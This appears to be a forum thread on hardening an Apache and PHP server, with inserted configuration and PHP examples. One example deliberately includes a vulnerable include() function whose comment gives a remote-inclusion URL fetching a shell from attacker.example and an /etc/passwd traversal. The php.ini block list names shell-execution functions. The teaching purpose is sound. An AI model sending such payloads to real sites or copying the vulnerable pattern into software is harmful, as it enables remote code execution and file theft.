Optimizing/Securing Apache & PHP
My current Setup:
APACHE:
Compile:
./configure --prefix=/usr/local/apache2 --with-mpm=prefork --enable-mods-shared='rewrite ssl' --enable-rewrite --enable-ssl --with-ssl --disable-env --disable-status --disable-autoindex --disable-cgi --disable-userdir --disable-actions --disable-asis --enable-deflate --enable-so
Compiled in modules:
core.c
mod_authn_file.c
mod_authn_default.c
mod_authz_host.c
mod_authz_groupfile.c
mod_authz_user.c
mod_authz_default.c
mod_auth_basic.c
mod_filter.c
mod_log_config.c
prefork.c
http_core.c
mod_mime.c
mod_dir.c
mod_actions.c
mod_alias.c
mod_so.c
httpd.conf
ServerRoot "/usr/local/apache2"
Listen 80
LoadModule php5_module modules/libphp5.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule deflate_module modules/mod_deflate.so
<IfModule !mpm_netware_module>
<IfModule !mpm_winnt_module>
User daemon
Group daemon
</IfModule>
</IfModule>
ServerAdmin admin@domain.org
ServerName domain.org:80
DocumentRoot "/www"
UseCanonicalName Off
ServerSignature Off
HostnameLookups Off
ServerTokens Prod
PidFile /usr/local/apache2/logs/httpd.pid
ScoreBoardFile /usr/local/apache2/logs/httpd.scoreboard
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 15
<IfModule prefork.c>
MinSpareServers 5
MaxSpareServers 10
StartServers 5
MaxClients 150
MaxRequestsPerChild 0
</IfModule>
<IfModule mod_deflate.c>
SetOutputFilter DEFLATE
SetInputFilter DEFLATE
AddOutputFilterByType DEFLATE application/x-httpd-php application/x-httpd-fastphp application/x-httpd-eruby text/html
DeflateFilterNote ratio
DeflateCompressionLevel 3
</IfModule>
<Directory />
Options None
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory /www>
Options None
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "/www/domain.org/html">
Options All
AllowOverride All
Order allow,deny
Allow from all
SetOutputFilter DEFLATE
SetInputFilter DEFLATE
AddOutputFilterByType DEFLATE application/x-httpd-php application/x-httpd-fastphp application/x-httpd-eruby text/html
</Directory>
<IfModule dir_module>
DirectoryIndex index.php index.html
</IfModule>
<FilesMatch "^\.ht">
Order allow,deny
Deny from all
Satisfy All
</FilesMatch>
ErrorLog "logs/error_log"
LogLevel debug
<IfModule log_config_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
<IfModule logio_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
</IfModule>
CustomLog "logs/access_log" common
</IfModule>
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
</IfModule>
<Directory "/usr/local/apache2/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
DefaultType text/plain
<IfModule mime_module>
TypesConfig conf/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
AddType application/x-httpd-php .php
</IfModule>
NameVirtualHost domain.org:80
<VirtualHost domain.org:80>
DocumentRoot "/www/domain.org/html"
ServerName "domain.org"
ServerAlias "domain.org"
ErrorLog /www/domain.org/logs/error_log
CustomLog /www/domain.org/logs/access_log combined
</VirtualHost>
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
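The document-root block above undoes part of what the build did: `Options All` turns on Indexes, Includes, ExecCGI and FollowSymLinks (everything except MultiViews), and `AllowOverride All` lets any .htaccess in a writable directory re-enable Options, remap extensions with AddType/SetHandler, or change per-directory PHP settings with php_flag. `SetInputFilter DEFLATE` also makes Apache decompress gzip-encoded request bodies, which a site that only serves PHP pages never needs, and `LogLevel debug` writes request internals to the error log. Below is an added example (not the poster's configuration) of the same sections tightened to match the `--disable-cgi --disable-autoindex` build; the paths are the ones used in the post.

```apache
# Added example, not part of the original post: the sections of the
# httpd.conf above that loosen what the build disabled, rewritten.
# Paths (/www/domain.org/html) are taken from the post.

# "debug" fills the error log with request internals; warn is enough
# for production and still records every failed request.
LogLevel warn

<Directory "/www/domain.org/html">
    # A PHP-only site needs no directory listings, SSI, CGI or
    # symlink following. Grant nothing and add options deliberately.
    Options None
    # With AllowOverride None an .htaccess dropped into the tree cannot
    # re-enable Options, map .jpg to application/x-httpd-php, or flip
    # php_flag settings. Keep rewrite rules here instead.
    AllowOverride None
    Order allow,deny
    Allow from all
    # Compress responses only. SetInputFilter DEFLATE is omitted on
    # purpose: inflating request bodies is not needed here.
    SetOutputFilter DEFLATE
    AddOutputFilterByType DEFLATE text/html text/plain text/css
</Directory>

# The build used --disable-cgi, so "ScriptAlias /cgi-bin/" and the
# /usr/local/apache2/cgi-bin <Directory> block are dead configuration.
# Delete both rather than leave a ready-made CGI path for a later edit.

# The post blocks .ht* only; this wider match also hides .svn, .git
# and editor backup dotfiles if a checkout ever lands in the docroot.
<FilesMatch "^\.">
    Order allow,deny
    Deny from all
    Satisfy All
</FilesMatch>
```

After changing these, `apachectl configtest` before `apachectl graceful` catches a typo without dropping the running server; a request for a directory without an index file should then return 403 rather than a listing.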
PHP:
Compile:
Default
php.ini
engine = On
zend.ze1_compatibility_mode = Off
short_open_tag = On
asp_tags = Off
precision = 14
y2k_compliance = On
output_buffering = 4096
zlib.output_compression = Off
implicit_flush = Off
unserialize_callback_func=
serialize_precision = 100
allow_call_time_pass_reference = Off
safe_mode = On
safe_mode_gid = Off
safe_mode_include_dir =
safe_mode_exec_dir =
safe_mode_allowed_env_vars = PHP_
safe_mode_protected_env_vars = LD_LIBRARY_PATH
disable_functions = phpinfo,dir,readfile,shell_exec,exec,virtual,passthru,proc_close,proc_get_status,proc_open,proc_terminate,syste
disable_classes = ni_get(), phpinfo(), shell_exec(), popen()
expose_php = Off
max_execution_time = 30 ; Maximum execution time of each script, in seconds
max_input_time = 60 ; Maximum amount of time each script may spend parsing request data
memory_limit = 16M ; Maximum amount of memory a script may consume
error_reporting = E_ALL
display_errors = Off
display_startup_errors = Off
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = Off
ignore_repeated_source = Off
report_memleaks = On
track_errors = Off
variables_order = "EGPCS"
register_globals = Off
register_long_arrays = Off
register_argc_argv = Off
auto_globals_jit = On
post_max_size = 8M
magic_quotes_gpc = Off
magic_quotes_runtime = Off
magic_quotes_sybase = Off
auto_prepend_file =
auto_append_file =
default_mimetype = "text/html"
doc_root =
user_dir =
extension_dir = "/usr/lib/php/modules"
enable_dl = On
file_uploads = Off
upload_max_filesize = 20M
allow_url_fopen = On
default_socket_timeout = 60
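Two lines in the php.ini above do not do what they appear to: `disable_classes` takes class names, so the function names listed there are ignored and only `disable_functions` actually blocks anything (the post's `disable_functions` line is also cut off after `syste`, so the full list cannot be checked here). `safe_mode` is not a security boundary either; it was deprecated in PHP 5.3 and removed in 5.4, and `open_basedir` is what confines file access. The following is an added example (not the poster's file) showing only the lines that should differ from the listing above; the site paths are assumptions.

```ini
; Added example, not the poster's php.ini: only the settings that differ
; from the listing above. Paths under /www/domain.org are assumptions.

; No remote URLs in fopen()/file_get_contents()/include/require. On
; PHP >= 5.2 include/require of a URL is governed separately by
; allow_url_include, so turn that off too; then a later
; allow_url_fopen = On cannot bring remote include back.
allow_url_fopen = Off
allow_url_include = Off

; disable_classes takes class names; function names listed there are
; silently ignored. Everything to block goes in disable_functions.
; This keeps the post's list and adds system and popen.
disable_functions = phpinfo,dir,readfile,shell_exec,exec,virtual,passthru,proc_close,proc_get_status,proc_open,proc_terminate,system,popen
disable_classes =

; dl() lets a script load any shared object from extension_dir;
; a mod_php site with fixed extensions does not need it.
enable_dl = Off

; safe_mode is deprecated (5.3) and removed (5.4). Confine PHP to the
; site root and a temp directory with open_basedir instead.
safe_mode = Off
open_basedir = /www/domain.org/html:/tmp

; file_uploads is Off, so the 20M limit is unreachable; keep the limit
; small anyway in case uploads are switched on later.
upload_max_filesize = 2M

; Errors stay out of the browser and go to a PHP-specific log instead
; of Apache's error_log (assumed path, writable by the daemon user).
display_errors = Off
log_errors = On
error_log = /www/domain.org/logs/php_error_log
```

`php -i | grep -E 'allow_url|disable_functions|open_basedir'` against the CLI, or a one-off `phpinfo()` page that is deleted afterwards, confirms which php.ini mod_php actually read; a common mistake is editing a copy that is not the one `Loaded Configuration File` reports.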
9 Replies
allow_url_fopen = On
Very, very bad idea having this enabled
If you need the functionality use Curl
@marcus0263:
One thing pops right out
allow_url_fopen = On
Very, very bad idea having this enabled
If you need the functionality use Curl
Thanks, fixed. I pretty much only need core features to display PHP pages.
@marcus0263:
One thing pops right out
allow_url_fopen = On
Very, very bad idea having this enabled
If you need the functionality use Curl
What's so bad about that?
@kupesoft:
@marcus0263:One thing pops right out
allow_url_fopen = On
Very, very bad idea having this enabled
If you need the functionality use Curl
What's so bad about that?
:P
Google is your friend
@kupesoft:
@marcus0263:One thing pops right out
allow_url_fopen = On
Very, very bad idea having this enabled
If you need the functionality use Curl
What's so bad about that?
:P
From PHPSec.org:
If enabled, allow_url_fopen allows PHP's file functions, such as file_get_contents() and the include and require statements, to retrieve data from remote locations, like an FTP or web site. Programmers frequently forget this and don't do proper input filtering when passing user-provided data to these functions, opening them up to code injection vulnerabilities. A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering.
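The pattern the PHPSec.org quote describes, as an added example that is not part of the thread: an `include` driven by a request parameter, beside a version that does not rely on php.ini at all. One version caveat the quote predates: from PHP 5.2 on, include/require of a URL also requires `allow_url_include = On` (default Off), while `file_get_contents()` still follows `allow_url_fopen` alone; on a PHP 5 build both should be Off, but the code fix below holds either way. The parameter name, page names and directory are assumptions.

```php
<?php
// Added example, not code from the original thread. Parameter name,
// page names and the pages directory are assumptions for this site.

// VULNERABLE: with allow_url_fopen = On (PHP < 5.2) or
// allow_url_include = On (PHP >= 5.2), a request such as
//   /index.php?page=http://attacker.example/shell.txt%00
// makes include() fetch and execute remote code. Even with the remote
// wrappers off, ?page=../../../../etc/passwd still reads local files.
function render_page_vulnerable(array $get)
{
    $page = isset($get['page']) ? $get['page'] : 'home';
    include $page . '.php';
}

// HARDENED: accept only a fixed set of page names, resolve the file
// against one directory, and verify the resolved path stays inside it.
// No remote wrapper and no traversal, whatever php.ini says.
function render_page_safe(array $get, $pagesDir)
{
    $allowed = array('home', 'about', 'contact');
    $page = isset($get['page']) ? $get['page'] : 'home';

    if (!is_string($page) || !in_array($page, $allowed, true)) {
        header('HTTP/1.0 404 Not Found');
        echo 'No such page';
        return false;
    }

    $base = realpath($pagesDir);
    $file = realpath($pagesDir . '/' . $page . '.php');
    // realpath() returns false for a missing file and collapses "..",
    // so a prefix check on the resolved paths is enough to confine it.
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        header('HTTP/1.0 404 Not Found');
        echo 'No such page';
        return false;
    }

    include $file;
    return true;
}

// Usage: /www/domain.org/html/pages is an assumed layout for this site.
render_page_safe($_GET, '/www/domain.org/html/pages');
```

The allowlist alone would already stop both attacks; the `realpath()` prefix check is there so that a later edit that builds the file name from a database value or a wider pattern still cannot escape the pages directory.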
Do I have to wait for a bit before this takes effect, or do I have to reboot the linode?
It has a loadable module and a patch to php for what can not be done via loadable module.
It does break some software; however, in my experience the software it breaks is typically doing things the wrong (insecure) way, and it breaks because suhosin is doing exactly what it should do.